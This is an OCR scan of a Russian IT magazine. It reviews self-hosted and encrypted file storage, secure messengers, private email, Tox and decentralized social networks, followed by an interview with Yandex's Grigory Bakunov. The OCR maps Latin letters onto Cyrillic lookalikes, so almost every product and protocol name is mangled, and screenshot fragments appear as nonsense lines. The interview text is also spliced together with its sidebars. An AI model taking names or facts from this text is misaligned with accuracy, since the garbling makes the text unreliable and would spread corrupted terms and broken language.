Для индексации и для быстрого поиска по хранилищу ис- 
пользуется библиотека Араспе Шисепе. 

Написан АдаХрогег с использованием НТМЕ, РНР Адах 
и Чауа$сирт. Используются стандартные драйверы файловой 
системы, поэтому сервер легко переносить и масштабировать. 


Для АлаХрогег доступны плагины, позволяющие интегрировать его в по- 
пулярные СМ$, базирующиеся на РНР, — Огира1, М/огаРге$$ и Доопйа. Доступен 
соответствующий АРТ, поэтому список легко расширить. Модульность по- 
зволяет нарастить возможности и собрать систему под конкретные нужды 
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ЗЕАРИЫЕ 

Самый молодой продукт обзора — ЗеайЕ ( ). Первые 
версии были представлены в конце 2012 года, но до релиза 1.3 
интерфейс был только на китайском языке, поэтому популяр- 
ность он лишь начинает набирать. В Зеайе реализованы не толь- 
ко функции хранения и синхронизации данных, но и элементы 
совместной работы с контентом. Пользователь может создавать 
любое количество библиотек (по сути, отдельное виртуаль- 
ное хранилище) и открывать доступ для групп, контактов или 
без ограничений. Допущенные пользователи через библиотеку 
обмениваются файлами. В случае изменений предусмотрена 
возможность отправки уведомлений. При создании библиотеки 
возможна активация доступа по паролю и шифрование. В случае 
активации шифрования документ «закрывается» до отправки 
на сервер (его могут просмотреть только допущенные пользова- 
тели), поддерживается НТТР®$. На уровне библиотеки также ре- 
ализовано отслеживание версий (по умолчанию 60 дней, можно 
изменить число, хранить всю историю или отключить совсем), 
доступ к предыдущим редакциям, восстановление удаленно- 
го файла, аудит (кто и когда внес изменения). Поддерживается 
предварительный просмотр основных типов файлов, обсужде- 


Моя библиотеки 


фев 


ние информации с участниками группы, функции ведения спи- 
сков задач и управления проектами, персональное \МН.. 

Еще одним плюсом является меньшая нагрузка на сервер, 
по сравнению с другими участниками обзора. 

Доступ к данным возможен как через веб-интерфейс, так 
и при помощи клиента ЗеаШе (\МИпаомз, Мпих, О$ Х, Апагоа 
и 5). 

Код проекта написан на языке РУПоп и распространяется 
под лицензией СРИ\З, для хранения метаданных используется 
5ОЩе. Версия Соттипку ЕЧйюп серверной части предлага- 
ется бесплатно для МШпих и РазрБегту Р!, для \ММпао\м$ цена со- 


ставляет 150 долларов. Также есть Рго ЕЧоп с большими воз- 
можностями: доступ по \ММеброА\, функции поиска, оповещение 
по етай и другое (подробнее здесь: ). Кроме того, 
можно размещать файлы на сервере разработчика (бесплатно 
предоставляется до 1 Гб). 


ЗАКЛЮЧЕНИЕ 

Каждое решение имеет свои плюсы и минусы, поэтому нужно 
выбирать исходя из конкретных задач. АаХр!огег и омптСюца 
подкупают своими богатыми функциями, а ЗеаНе — легкостью 
и простотой, а также возможностью групповой работы. 2= 


В ЗеаШе можно создать 
несколько библиотек, 
которые затем синхро- 
низировать по отдель- 
ности 


Найти хранилище для своих файлов сегодня легко, свои варианты предлагают и разра- 
ботчики ОС, например Арре 'Сюоца, Убити Опе, Мсгозой Зку0п\уе. Но со временем об- 
наруживаются те или иные проблемы в безопасности, хостеры признают, что могут кон- 
тролировать контент и закрыть аккаунт. Естественно, у пользователей возникло разумное 
сомнение, стоит ли впредь доверять свои личные файлы «кому попало». Как результат, 
появились альтернативные сервисы, заявляющие о большей защищенности информации: 


\Миа (миа!а.сот) — шифрование файлов производится локально при помощи клиента 
(ММпаом/з, Ипих, Апагоа, Ю$, уама — веб-доступ), а затем они загружаются на сервер. 
При этом данные разделяются на несколько частей, которые хранятся в разных местах, 
что обеспечивает меньшую вероятность их потери. Используется АЕЗ-256 для шиф- 
рования, ВЗА-2048 подпись и обмен ключами при совместном использовании папок, 
ЗНА-256 для проверки целостности; поддерживается З$Е. Все ключи для расшифров- 
ки хранятся локально. Администраторы сервиса могут просмотреть лишь количество 
занимаемого места, от них скрыты даже метаданные. Правда, это означает, что и вос- 
становить информацию при потере пароля невозможно (доступна подсказка пароля). 
При необходимости шифрование можно отключить. При совместном использовании 
файлов шифрование также не применяется. Бесплатно доступно 5 Гб, пространство 
можно увеличить до 1 Тб. 

брюаегОак (зр!егоак.сот) — проект, развивающийся с 2007 года, по принципу анало- 
гичен М/иа!а. Пользователю бесплатно предоставляется 2 Гб, в дальнейшем место мож- 
но наращивать до 100 Гб. Реализованы клиенты для \М/паом/$, Мпих, 0$, Апаго и №900 
(ожидается В!аскВеггу и\\Мтаомз РПопе), есть веб-доступ. Ещегризе-версия отличается 
дополнительными возможностями, вроде 550 АБ/ТРАР, и расширенными функциями 
администрирования. Применяется многоуровневый подход к шифрованию с использо- 
ванием комбинации АЕ$-256/АЗА-2048. Поддерживается 55$. 

Тгезогй (тезогй.сот) — новый игрок, предлагающий бесплатно 5 Гб места (по акциям 
можно отхватить 50 Гб), шифрование ведется на стороне клиента (АЕ$-256/ЗНА-512), 
реализованы агенты для ММп4ом/$, ЮЗ и Апаго. Веб-доступа нет. Общие файлы хранят- 
ся в зашифрованном виде и «раскрываются» после загрузки. 

Меда (теда.со.п7) — проект с участием Кима Доткома, предлагающий бесплатно 
50 Гб места, с возможностью поднять за $$$ до 4 Тб. Файлы перед загрузкой зашиф- 
ровываются (АЕ$-128) на стороне пользователя через уЧама сир: (в будущем НТМЕ5 АР! 
\МебСгурто). Соединение дополнительно «закрывается» при помощи УЗ. В отличие 
от других сервисов, не предлагаются клиенты и возможность синхронизации, только 
загрузка/выгрузка через браузер. Администратор не может получить доступ к файлам, 
но может просмотреть структуру данных. 


Меда.со.пг предлагает 50 Гб места, но доступ толькочерез веб 
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БЕЗОПАСНЫЕ СПОСОБЫ ОБЩЕНИЯ В СЕТИ 


Переходим к самой печальной части нашего рассказа. Хотя почти для каждого типа онлайн- 
коммуникаций есть защищенные решения, для их применения придется убедить твоего собе- 
седника в том, что «так нужно». Как подсказывает опыт фанатов уаббег, сделать это без вмеша- 
тельства крупных компаний невозможно. Поэтому данный обзор несет скорее футуристический 
характер — если все это найдет спрос, возможно, кто-нибудь когда-нибудь научится на этом 


зарабатывать. 


Для пересылки защищенных сообщений разработан крипто- 
графический протокол ОТВ (ОН-е-Весога). Для создания 
сильного шифрования протокол использует комбинацию алго- 
ритмов АЕ$, симметричного ключа, алгоритма Диффи — Хел- 
лмана и хеш-функции ЗНА-1. 

Основное преимущество ОТН перед другими средствами 
шифрования — это его применение на лету, а не после под- 
готовки и оправления сообщения. Он был разработан Никитой 
Борисовым и Яном Голдбергом. Для использования в сторон- 
них приложениях разработчики протокола создали клиентскую 
либу. Поэтому, чтобы защитить передачу данных по |1М-каналам, 
можно воспользоваться специально предназначенными для за- 
щиты приложениями. 

Один из подобных проектов — Сгуртосаг; это веб-аппликация 
с открытым исходным кодом, написанная на 4$. Имеются рас- 
ширения для СПготе, РгеГох и Затап. Кроме того, есть кли- 
ентское приложение, но только для О$ Х. Криптокат шифрует 
сообщения на клиенте и передает их доверенному серверу. 
Для этого на стороне клиента используется симметричное шиф- 
рование сообщений и файлов с использованием АЕЗ$-256 и вы- 
бранного ключа. Для каждого чата генерируется новый ключ. 

Другие участники разговора — до десяти человек в комна- 
те — смогут прочитать их, только если сами правильно введут 
тот же самый ключ. Для надежной передачи ключей исполь- 
зуется алгоритм Диффи — Хеллмана, для генерации уникаль- 
ных отпечатков при аутентификации — хеш-функция \ЛПироч|, 
а для проверки целостности сообщений — НМАС-\МН!АЕРООЕК. 
Метод работы с ключами превращает Сгуртоса{ в систему со- 
вершенной прямой секретности, в которой даже потеря за- 
крытого ключа не может скомпрометировать ключ сессии. Лог 
переписки удаляется через 30 минут отсутствия активности, 
а сам сервис работает с постоянным ЭЗЁ-шифрованием. 

Еще один проект подобного рода — ВИйте$заде, написан- 
ный Джонатаном Уорреном на питоне. Витеззаде — это де- 
централизованная Р2Р-программа для обмена зашифрован- 
ными сообщениями между двумя и/или несколькими юзерами. 
Она использует сильную криптографию, которая надежно за- 
щищает абонентов от прослушивания на уровне интернет-про- 
вайдера или на сервере. Стоит заметить, что криптографиче- 
ская система практически в точности копирует схему, которая 
используется в Р2Р-системе Вйсот, однако направлена на об- 
мен сообщениями. Особенность Вйтеззаде состоит в том, 
что факт общения двух пользователей практически невозможно 
доказать: сообщение передается не напрямую от пользователя 


АкБ, арассылкой всем участникам сети (подобный подход реа- 
лизован в Тог). При этом прочитать его может только тот пользо- 
ватель, с которым установлено соединение и который обладает 
корректным ключом для расшифровки. 

Последним проектом этого ряда, который мы рассмотрим, 
будет ТогСпа{. Сеть ТогСпа{ представляет собой свободную 
децентрализованную высокоанонимную криптозащищенную 
систему обмена мгновенными сообщениями и файлами. Весь 
код открыт, а следовательно, проверяем. ТогСпа{ в основе 
своей использует анонимную сеть Тог, но это полностью обо- 
собленный проект. Анонимность передачи данных целиком 
возлагается на скрытые сервисы Тог, ТогСпаф по сути, лишь 
надстройка к ним, занимающаяся обработкой сообщений. 
Криптозащита соединения двух пользователей также обе- 
спечивается скрытыми сервисами Тог посредством асимме- 
тричного шифрования по стандарту В$ЗА. Изначально ТогСпа{ 
был написан на питоне, клиент для О$ Х, соответственно, 
на ОБеси\уе С. В начале 2012 года был запущен проект ЛогСПаф, 
разрабатываемый на уауа. Пока в нем не реализована вся 
функциональность оригинального ТогСпаг, к примеру отсут- 
ствует передача файлов. 


ПРИВАТНАЯ ПОЧТА 
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Хотя на мобильных 
устройствах можно 
использовать веб- 
интерфейсы рассмо- 
тренных мессенджеров, 
в разработке находится 
средство обмена мгно- 
венными сообщениями, 
специально заточенное 
под мобилы 


(ВЕ рэ://Пет1.1$}. 


Широкую известность получило самозакрытие почтового сервиса |ауабК.сот, 
которым воспользовался Сноуден. Сервис был закрыт после того, как спецслужбы 
предъявили требования предоставить доступ кхранимым данным. 

Полную альтернативу Ёауаб\" найти сложно (кроме зе!-по ед решений), 
но в качестве более-менее защищенного сервиса можно предложить УЕЕтай 
( ). Он сканирует каждое пришедшее письмо и его вложения 
в поисках вирусов и спама. Если была обнаружена малварь, письмо блокиру- 
ется на шлюзе и не попадает на сервер. Почтовый сервер поддерживает серые 
и черные списки, а для определения спама используется заслужившая признание 
система ЗратА$заззт. Работа с УЕЕтай идет посредством стандартных протоко- 
лов РОР МАР, ЗМТР а веб-интерфейс реализован по защищенному 551 -каналу. 
Как и большинство современных почтовых служб, \/ЕРЕтай поддерживает открытие 
в браузере Мсгозо® О!йсе документов. Однако за полученную секретность пере- 
писки приходится платить. Правда, есть бесплатный, так называемый «медный 
аккаунт», предоставляющий пользователю 50 Мб серверного пространства для пи- 
сем. Для увеличения места надо купить другой, более совершенный аккаунт. 
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ГОЛОСОВОЙ И ВИДЕОЧАТ 

С мгновенными текстовыми сообщениями мы анонимны, 
а что насчет голосового и видеообщения? Экуре принадлежит 
М!сгозой, а она (по документам Сноудена) была уличена в пере- 
даче сведений спецслужбам. 

Поэтому нужны другие варианты. Одним из них стал про- 
ект Тох ( ) — открытая и свободная альтернатива ЗКуре. 
Он использует похожую на 5куре Р2Р модель организации 
взаимодействия в сети для распространения сообщений, ис- 
пользующую криптографические методы для идентификации 
пользователя и защиты транзитного трафика от перехвата. 
Поддерживается обмен текстовыми сообщениями, голосовая 
связь, видеозвонки и передача файлов. Работа организована 
через простой и типичный для 1М-клиентов графический интер- 
фейс. 

Одна из ключевых задач проекта — обеспечить приватность 
и тайну переписки, в том числе защиту от возможного анализа 
трафика. Для обеспечения адресации пользователей исполь- 
зуется распределенная хеш-таблица (ОНТ), работа с которой 
организована в стиле ВИТотет. Канал связи организуется 
при помощи надстройки над протоколом ЧОР с реализацией 
сеансового уровня (10$$1е$$ ЦОР). 


Вообще, соцсети слабо вяжутся с концепцией 
анонимности и приватности переписки. Эти 
сервисы стали источником информации о ли- 
цах всех возрастов: люди пишут в соцсети все 
о себе, своих близких и друзьях, выкладывают 
жизненные фото и видео. Можно ограничить 
доступ к этим сведениям, но это не преграда 
для спецслужб — известны случаи, когда по за- 
просу властей им передавались интересую- 
щие их данные о пользователях. Безусловно, 
соцсети — зло! Но иногда хочется поделиться 
чем-то с родными или рассказать о достиже- 
нии близким друзьям. Поэтому даже соцсети 
играют положительную роль. 

Чтобы защитить свои приватные данные 
от посторонних глаз, можно воспользоваться 
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свободными защищенными аналогами. У них, 
конечно, гораздо меньше юзверов — 15-летних 
школьниц, фоткающихся с ойфонами, но тем 
лучше. И чем больше пользователей будут по- 
нимать значимость приватности информации, 
а к этому все идет, тем большее их число будет 
переходить в защищенные соцсети. 

Одна из таких сетей — Ейепаса (Тпепо!са. 
сот). Проект был начат в 2011 году Майком 
Макгривином. Ейеп са — свободная со- 
циальная сеть с открытым исходным кодом, 
дислоцирующимся на СИНиь. Она предостав- 
ляет широкий выбор коннекторов для разно- 
образных социальных сетей: как традиционных 
(Гасебоок, ТмЩег), так и новых (О'азрога, 
1Аепи.са). Кроме того, с помощью Епепа!са 
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Фа мы 


Базис / ИА ЗяиНпОе 


ОСИ 
@Бола 
пала лавина сот 


Бопюнайтенти. 15; 


+0 1012346 


Мао 


МИ Згавниста, ово Руенил 15 


Для идентификации каждого пользователя используется 
специальный публичный ключ, который также применяется 
как открытый ключ для шифрования. Отдельно генерируется 
закрытый ключ для расшифровки сообщений, зашифрованных 
с использованием идентификатора / открытого ключа. Для ор- 
ганизации коммуникаций требуется соединение к пиру (каждый 
клиент сети является пиром), который может быть определен 
вручную или найден автоматически (доступна функция поиска 
пиров в локальной сети). 

Код Тох написан на языке Си и распространяется под ли- 
цензией СРИЬЗ. Поддерживаются платформы Шпих, М/пдом$ 
и 0$ Х. Для организации шифрования используется библио- 
тека ИБзоЧит. Функциональность разработки пока находится 
на уровне серии тестовых прототипов, консольного клиента, 
написанного с использованием библиотеки псиг$е$, и графиче- 
ского клиента на базе С15. 

Кроме того, в СМУ создается альтернатива под названием 
СМУ Ргее Сай. Этот проект нацелен на разработку и внедрение 
по всему миру безопасных и самоорганизующихся коммуника- 
ционных сервисов. В качестве базового протокола в СМИ Ргее 
Са! будет использоваться З!Р поддержка которого обеспечена 
при помощи \оР-сервера СМУ $Р \Мсп. Коммуникационная 


9 7Пеп са 
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Ала силу пли пена орагинае Сено РБ 


$ СНр5 Напдоп 


Опйпе х Розу Ноу пал, 
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ое сырз вай пав ир? 


Зоггу, | мае аб Вл а КИСНал, 


— РОЗ Овсо Тпипдег.. | 
МИОГЕЕЛО оп гу пм... ГРОЗУ — ОП увай? 


Нара, злой (Аа а Иг5! 
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Е бо уси гоплептбне Полу И ид 10 650? 


Ргоз\у Отзсо Тлипфег М/гиег Везг т 
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Мей члога усны плату 
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ЕНа ТгапеТагг: 
05001377 ]р9 


Тиз сна 


2048х1152 
б2вкв 


\мповг ЕзгаЧа 


|| Туре усиг пле5заое Мото... 


сеть построена с использованием Р2Р-технологий и имеет то- 
пологию тезй-сети, в которой каждая клиентская точка сети 
связана через соседние клиентские точки. Конечной целью 
проекта является формирование \оР-сети, напоминающей 
ЗКуре по возможностям и удобству использования. 

С технической стороны для реализации проекта в СМИ $Р 
М/си, кроме функции маршрутизации З!Р-звонков, будет обе- 
спечена поддержка работы в роли защищенного \/о!Р-прокси, 
добавлена возможность хранения кеша хостов и выполнения 
функций обмена маршрутами с соседними узлами тезП-сети. 
Поддержка \МоР-прокси позволит упростить построение поль- 
зовательских интерфейсов и создание приложений для мо- 
бильных устройств, поскольку обеспечит поддержку приема 
и выполнения звонков с любых З!Р-совместимых программных 
телефонов. 


можно обмениваться письмами и читать В$$- 


Сырз  Уси’ге по доля №2 Бе могу Парру м А то... 


Тох — открытый аналог 
Зкуре 
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Ударяться в панику 

т из-за слежки не имеет 

таз смысла. Есть заши- 

— щенные решения всех 
привычных служб: 
электронной почты, 
мгновенных сообще- 
ний, голосового/видео- 
чата, соцсетей 


Клиентское ПО для работы в сети СМУ Ргее Са! будет под- 
держивать широкий спектр разнообразных программных 
платформ. Сеть будет иметь полностью децентрализованную 
структуру, не привязанную к отдельным управляющим серве- 
рам. 


ИТОГИ 

Как видишь, ударяться в панику из-за тотальной слежки не име- 
ет никакого смысла. Существуют защищенные решения всех 
привычных служб: электронной почты, мгновенных сообщений, 
голосового/видеочата, соцсетей. Если воспользоваться ими, 
то никакой Болышой Брат (или скромная спецслужба) не зале- 
зет в твои дела. Никто не в состоянии остановить распростра- 
нение информации в интернете! 

Используй все возможности Сети в своих целях! = 


сеть базируется на трех принципах. В отличие 


Бе Бой ртраарану а п Би 


параши ше п ит па пела ршбн одни, 


Ш. 


я. 
Е 
я 


лы 


м, 


ленты. Если в Епепа!са сделать фото закрытым, 
то оно на самом деле будет в привате и никто 
(кроме, естественно, владельца и избранных 
им лиц) не сможет получить к нему доступ. 

В настоящее время идет разработка сле- 
дующей версии соцсети под названием Веа 
(что с испанского означает «сеть»). По словам 
авторов, во время разработки Епеп4гса были 
осознаны детали и обкатаны механизмы раз- 
работки соцсетей, поэтому следующий проект 
станет еще лучше и будет избавлен от фунда- 
ментальных недостатков первой версии. 

Еще одна защищенная социальная сеть, 
на которую мы обратим внимание, — это 
Отазрога (пЁрз://ош@!азрога.сот). Данная 


от традиционных соцсетей, где данные хранят- 
ся в одном дата-центре, то бишь централизо- 
ванно, в Олазрога, как и во многих защищенных 
в вебе продуктах, данные хранятся децен- 
трализовано. В этом случае данные хранят- 

ся не на центральном сервере, а на подах 
(роа) — компьютерах тех пользователей, кто 
предоставил их для этой цели. Второй принцип, 
конечно же, свобода, кто мог сомневаться? 
Третий принцип — секретность. Никто, кроме 
тебя, не имеет доступа к твоим данным, а кто 
может их просматривать, определяешь ты сам, 
устанавливая разрешения. И они действуют 
глобально, то есть никто их не нарушит. 


—— ГРИГОРИЙ БАКУНОВ —— 
АКА ВОВИК 


АДИЦИОННЫЙ 


| Беседовал 

Степан.Ильин 
= 
ча 
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Традиционный твит со сцены 


Кому-то Григорий знаком по подкасту «Радио-1Т», соавтором которого он яв- 
ляется уже семь лет. Кому-то он запомнился по выступлениям на различных 
технотусовках. Кто-то видел его проекты на ОННиь’е. Но блиц-опрос, прове- 
денный в редакции, показал, что никто не знает, чем он занимается в реальной 
жизни. Самая близкая к истине версия звучала так: «Ну, наверно, что-то вроде 
евангелиста». На самом деле все сложнее. Это же Яндекс. И это же Бобук. 


Если кто-то англоязычный спрашивает меня, чем я зани- 
маюсь, у меня есть отличная фраза: 1 4о ту Бе$1. Я делаю 
все, что могу, делаю то лучшее, что могу сделать. Это правда, 
я не кривлю душой. Если я вижу какую-то часть работы, кото- 
рую могу сделать, и понимаю, что никто больше до нее сейчас 
не дотягивается, я беру и делаю. 

Яндекс — такая компания, где ты можешь поработать 
руками в любой момент. Когда случилась трагедия и умер 
Илья Сегалович, мы решили, что нужно сделать сайт памяти. 
Этим сайтом занимались 5-6 человек, в том числе — яи один 
из руководителей нашего направления. Один фигачил руками 
код, другой делал ресайзилку картинок. У нас буквально все, 
начиная от уборщиц и заканчивая руководителями больших на- 
правлений, в состоянии поработать руками и любят это делать. 

Обычно я говорю, что в Яндексе плохо — здесь нужно 
работать. 

До Яндекса я работал техническим директором, 
но устал управлять людьми, и я сказал: «Хочу работать 
руками». Я готов был пойти в Яндекс, если меня возьмут про- 
сто админом. 

После короткого собеседования меня взяли в Яндекс 
на работу. Но через неделю стало ясно, что меня «кинули»: 
здесь нужно работать не только руками, но и головой. Еще че- 
рез полгода у меня опять завелись подчиненные. Еще через 
полтора года я, по несчастливому стечению обстоятельств, 
перешел из управления серверами к управлению людьми 
и разработками. Так и пошло — группа, отдел, направление... 
В общем, работы в Яндексе у меня до фига. 

Мой круг обязанностей — грустная тема. Последние 
пару лет я занимался тем, что облегчал жизнь Илье Сегалови- 
чу. Просто снимал с него задачи. Сейчас Ильи не стало, и воз- 
ник большой вопрос — что делать дальше? И внезапно пришло 
осознание, что нужно сделать всё, чтобы все те концепции, 
что остались после него, воплотились в жизнь. Их много. Я так 
прикинул... только их лет на пять нам точно хватит. 

Можно ли куда-то уйти? Это тоже грустная история. Дело 
в том, что людям, поработавшим в Яндексе, больше в России 
деваться попросту некуда. 


ИСТОРИЧЕСКИ СЛОЖИЛОСЬ 
Никто не понимает, что значит «директор по распростра- 
нению технологий». Название придумали, когда возникла 
необходимость прилепить мне хоть какую-то должность. Ее 
прилепили, ияне парюсь. 

Я выступаю шлюзом между компанией «Яндекс» 
и внешним миром. Пытаюсь вытащить наружу технологии, 
которые созданы внутри компании, а хорошие инструменты, 
которые есть снаружи, — затащить внутрь. Это удобная по- 
зиция. Потому что я очень хорошо знаю и постоянно слежу 
за тем, что происходит в мире. И при этом я обладаю некото- 
рым авторитетом внутри компании и представляю, что проис- 
ходит внутри. 

Вообще уследить за всем, что делается в Яндексе, не- 
просто. Все-таки в компании работает пять тысяч человек. 

Люди, занимающиеся некой технологией или на- 
правлением, знают про новые технологии, но не всегда 
успевают все пробовать. Поэтому нередка ситуация, когда 
ко мне приходит кто-нибудь и спрашивает: «А ты пробовал 


Саззапага? Как она?». И ты начинаешь рассказывать про все 
ужасы и прелести Саззапага, практически «блеск и нищета 
ореп $оиугсе». 

Кстати, если разработчику нравится, скажем, 
Саззапага, это еще не значит, что у него получится ис- 
пользовать ее в производстве. Придет администратор 
и скажет: «Ребята, мы пробовали эту штуку много раз и, мяг- 
ко выражаясь, не умеем ей пользоваться, она не подходит 
для наших работ. Давайте лучше выберем из этого или этого». 

С другой стороны, нужно быть в курсе всего, что де- 
лается в мире, нужно читать и все пробовать руками. Чи- 
тать для того, чтобы понимать, куда движется рынок, интернет, 
технологии. И постоянно пробовать что-то раньше всех, чтобы 
иметь собственное мнение о том, что это такое. Скажем, читая 
о МЛпао\м/$ РПопе и думая о том, что за ним стоит, можно пред- 
ставить себе какие-то ужасы. Зато, когда трогаешь это руками, 
понимаешь, что все совсем не так плохо. 

Кроме того, нужно вытаскивать новые концепции из на- 
ших разработчиков и людей, кто работает руками. Так, 
как в прошлом году мы вытащили «Острова». Нужно приносить 
идеи вкомпанию, а иногда и выносить какие-то концепты наружу. 

В анонсах, которые мы делаем на конференциях 
для разработчиков, очень много моей работы. Взять хотя 
бы Уе{ апо{Пег Соптегепсе (У\аС). Кстати, в этом году там будет 
отдельная секция по инфобезопасности. 

Чтобы быть в теме, у меня есть самописный инстру- 
мент для чтения новостей. Система, которая позволяет 
агрегировать штук 500 новостных потоков и выбирать из них 
в полуавтоматическом режиме то, что может быть мне потен- 
циально интересно. Что-то вроде Ризтайс’а, только сделан- 
ное задолго до его появления. 

Традиционные агрегаторы новостей считают перехо- 
ды и клики, а мне нужно другое. Я часто, еще не понимая, 
что означает этот снипет, перехожу по ссылке, чтобы разо- 
браться, что там такое. Для меня важнее, на какое время я за- 
держался на странице, проскроллил ли я первую страницу, 
промотав вниз, и так далее. 


ПОИСКОВАЯ КОМАНДА 

Рождение нового проекта в Яндексе обычно завязано 
на договоренностях. Чаще всего это выглядит так: есть чело- 
век, который горит некой идеей. Этот человек может быть тех- 
нарем, а может вообще работать в службе поддержки. Он на- 
чинает бегать по компании с криками «А давайте сделаем!». 

В конце концов он кого-то убеждает, люди собирают- 
ся вместе и обсуждают, как можно сделать такой сервис. 
После они идут к руководству компании, к примеру к руково- 
дителю своего направления, и говорят: «Есть вот такая гени- 
альная штука, давай сделаем». И тут участвует много сторон. 
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КРАТКО 


С 2006 года соведущий 
популярнейшего под- 
каста «Радио-Т». 


Занимает должность 
директора по распро- 
странению технологий 

Яндекса, но мало кто 
знает, что это означает. 


Ниндзя работоспособно- 
сти: спит 2—4 часа в день. 


Склонен к исследова- 

ниям мира: работал по 

контрактам в двадцати 
странах мира. 


Все измеряет. Установил, 
что внеделю получаетб,6 
писем, начинающихся 
со слов «У меня есть 
гениальная идея». 


Купилтри разных мото- 
цикла, но одновременно 
может ездить только на 
ОДНОМ. 


>350 


ВЫПУСКОВ 
«РАДИО-Т» ВЫ- 
ШЛО НА ДАННЫЙ 
МОМЕНТ. ПОД- 
КАСТ ВЫХОДИТ 
2006 ГОДА. 


Можно ли куда-то уйти? Это тоже 
грустная история. Дело в том, что 
людям, поработавшим в Яндексе, больше 
в России деваться попросту некуда 
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Интервью 


Есть программисты. Они программируют. У них чаще 


всего есть Теат |еа@ — человек, который руководит некой 
группой. Как правило, сам он тоже программирует. Програм- 
мисты разделяются на серверную и клиентскую часть, так 
как это совершенно разные области знаний. 

Про админов Яндекса нужно понимать, что наш сред- 
ний админ программирует лучше среднего программи- 
ста на рынке. Долгое время наши админы вообще писали 
совершенно свою ОС для использования внутри компании. 
Поэтому программистам легко договариваться с админами 
о том, как будет выглядеть проект с серверной точки зрения. 

Страшно не люблю термин «специалист по изег 
ехретепсе». Однако наши дизайнеры — это специалисты, ко- 
торые понимают, как пользователь работает с интерфейсом. 
Они рисуют, проектируют интерфейс будущего приложения 
или сайта. 

Еще есть ребята Антона Карпова (директор Яндек- 
са по ИБ. — Прим. ред.), они в основном бьют по рукам 
системных администраторов. Делают так, чтобы с самого 
начала все было понятно и безопасно. Они следят, чтобы ис- 
пользовались только безопасные компоненты, чтобы все было 


РАДИО-Т 


Самый популярный 
русскоязычный -есй- 
подкаст, выходящий 
с2006 года. На данный 
моментвышло более 
350 выпусков. Аудитория 
составляет примерно 
300 тысяччеловек, около 
2000 человек слушает 
в прямом эфире. 

В основном дляеже- 
недельных выпусков 
выбираются лайтовые 
темы о гаджетах и веб- 
сервисах, однако вначале 
каждого месяца делается 
самая мякотка — «гиков- 
ский» выпуск, в котором 
глубоко обсуждают 
разработку и системное 
администрирование. 


протестировано. 

Есть еще тестировщики. При- 
чем тестировщики есть разные, 
как функциональные (проверя- 
ющие все на соответствие заяв- 
ленной идее), так и тестировщики 
по нагрузке, которые так хорошо 
умеют проверить, не падает ли 
сервис под нагрузкой, что иногда 
приходится переписывать вообще 
все. 

Между всем перечисленным 
есть «клей». Этот человек назы- 
вается «менеджер проекта». Он — 
маршрутизатор сообщений, «чело- 
век с железными ногами», который 
бегает во все стороны и рассказы- 
вает всем, что происходит. 

А еще есть руководитель 
продукта. Эту должность может 
занимать любой из перечисленных 
людей. Он определяет, в какую сто- 
рону будет развиваться продукт. 
У него есть некое видение, он по- 
нимает концепцию в целом. 


Обычно проект закреплен внутри какого-то направле- 
ния. К примеру, есть направление поиска, карт или коммуни- 
кационных сервисов. И наверху каждого проекта, как правило, 
находится руководитель какого-то направления. Он немножко 
направляет происходящее в нужную сторону. 

А бывает и так, что какой-то продукт делает один че- 
ловек. Такое бывало не раз. Короче говоря, в Яндексе вообще 
очень гибкое распределение ролей. 


КАКВСЕ НАЧИНАЛОСЬ 
Я хорошо помню, что в первый раз заинтересовался ком- 
пьютерами, когда понял, что это нечто противоречащее 
родителям. Родители всегда говорили мне, что нужно зани- 
маться вот юриспруденцией или медициной, ая случайно уви- 
дел на работе у родителей своего друга настоящие компьюте- 
ры. Впечатление, конечно, было непередаваемое. После этого 
я понял, что это не то, чего хотят мои родители, а значит — это 
то, что мне нужно! 

Увлечение было невероятное. Компьютер я тогда мог 
увидеть максимум раз в неделю, когда заходил в гости на ра- 
боту к родителям того самого приятеля. Все остальное время 


ОБ ИЛЬЕ 
СЕГАЛОВИЧЕ 


Невозможно оценить, 
кем был Илья для ком- 
пании. Он не просто со- 
основатель Яндекса — 
он был тем человеком, 
который выстроил тот 
самый дух компании. 
К примеру, как должны 
строиться отношения 
между разработчиками 
и менеджерами. Как 
должна строиться 
работа. Что правильно, 
ачто нет. 


Онпринимал решения 
не только на начальном 
этапе, а до самого 
конца. Например, вего 
черновиках, которые 
он отправлял на узкую 
группу людей, было одно 
из важных решений по 
изменению структуры 
разработки компании. 
Мы довели эту концеп- 
цию до умаи внедрили 
уже после его смерти. 


Он был человеком, 
который во многом 
определял, как 
будет развиваться 
компания сточки зрения 
технологий, с точки 
зрения продуктов. 
Единственное, чем Илья 
в глобальном смысле 
не занимался, — это 
инвестиционная состав- 
ляющая компании. Во 
все остальное Илья был 
погружен на полную. 
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УАС?’13 уменя уходило на чисто теоретиче- 
ские изыскания. Никакого интерне- 

Уже четвертый год та тогда не было. 
подряд Яндекс прово- У меня до сих пор сохрани- 
диттехнологическую лась тетрадка, где я писал про- 
конференцию УаС (УЕ граммы от руки. Проверить их 
апо{пег Соп{егепсе). на реальном железе я не мог, по- 


В октябре 2013-го на 
секции «Безопасность» 
представители интернет- 


этому я сам выполнял функции 
компьютера, то есть сам все про- 
считывал. А потом в какой-то мо- 


индустрии расскажут, мент я случайно оказывался возле 
как они защищают компьютера, доставал тетрадку 
данные миллионов своих и быстро все перенабивал, прове- 


пользователей и какие 
крутые штуки можно 
сделать для безопасно- 
сти, когда есть «большие 
данные» (019 даа) и 
«большая математика» 
(619 та{й$). Зареги- 
стрироваться можно на 
емеп{$.уапдех.ги. 


рял, все ли в порядке, вносил ис- 
правления в код с обеих сторон — 
в то, что набрал, и вто, что написал. 
Было очень интересно. 

Моя первая работа в ИТ выгля- 
дела так: я писал БооНоааег’ы. 
В тот момент буйным цветом на- 
чали цвести Зресгит’ы, и хуже 
того — появились первые Спектру- 
мы с дисководами. Пара компаний, 
которые тогда торговали в России 
дисками, начали понемногу выпускать собственные диски 
с подборками игр. Разумеется, все это был 100% \м/агей, пото- 
му что легально тогда ничего не продавалось. 

К дискам тогда модно было делать загрузчик — програм- 
муна ассемблере, которая запускается первой после того, 
как ты вставишь диск. Вот в то время я занимался серийным 
производством этих самых загрузчиков — красивых программ, 
с бегущей полоской, разноцветными бэграундами, все как поло- 
жено. И деньги оттуда шли неплохие. Хорошо помню, что на этих 
рооНоааегах я зарабатывал больше, чем отец на заводе. 

Впоследствии, работая программистом, я очень мно- 
го времени потратил на езду по разным странам: мне 
было просто интересно поездить. Брал короткие контракты 
и по несколько месяцев занимался распознаванием образов, 
работой со звуком, оцифровкой данных со спутников — коро- 
че говоря, массой разных интересных и не очень вещей. Мне 
просто хотелось поездить по миру. 

Это было увлекательно, но рано или поздно это долж- 
но было закончиться. В итоге, я сначала пошел заниматься 
